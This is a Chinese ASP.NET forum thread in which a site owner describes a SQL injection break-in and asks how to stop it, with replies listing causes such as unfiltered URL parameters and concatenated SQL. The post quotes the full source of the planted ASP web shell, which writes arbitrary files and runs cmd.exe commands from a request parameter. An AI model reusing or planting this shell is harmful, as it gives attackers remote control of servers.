asp.net网站受到了url攻击. - .NET技术 / ASP.NET
注入了四个表
d99_cmd,d99_reg,d99_tmp,pangolin_test_table
在网站的根目录里注入了四个文件
98.asp,315.asp,db.asp,le.asp
在我的C盘里注入了一个cpand99.txt文件
它的内容是:
<%Dim objFSO%>
<%Dim fdata%>
<%Dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%else%>
<%end if%>
<%err.clear%>
<%end if%>
<%Set objFSO = Nothing%>
<%=server.createobject("wscript.shell").exec("cmd.exe /c" &request("c")).stdout.readall%>
我看了一下日志.是通过url用sql注入的.我想问一下我能不能通过重写一个url把这个解决掉.
还是就是能不能有别的办法不要再让它向里面写文件了.我网站已经把everyone 用户删除了.其它的用户也只有read的权限.可还是注入了.请高手救命呀!
不知道被注入的 URL 是什么?具体的其他参数?你的业务处理和数据过程?
url参数没过滤
sql存储过程没使用
文件上传类型识别不彻底
站内搜索框参数没过滤
.....
检查程序里面有没有拼接
相关问答:
C# code:
SqlConnection conn = CsDB.sqlcon();
SqlDataAdapter da = new SqlDataAdapter("select fwCoding from bjmuma_fwCoding where OrderNumber='" + Order + & ......
就是一个按钮,点击之后打开对话框,然后选取图片。就这样上传。。
怎么实现。在网上搜到那么多的代码,全是很多的那种,不知道,看不下去。
所以在这里想请大哥大姐帮帮忙。
使用自带的fileupload控件可以实现 ......
我有两个dropdownlist都绑好了值,想选中一个dropdownlist中的值,然后在另一个dropdownlist中选中相应的一项。
不是从新绑定第二个dropdownlist,是在已经绑好的值当中选中一个。
我想用js写
求助
你可以把drop ......
O O O O O O
|.......| |........| |.......|
| | |
O O ......
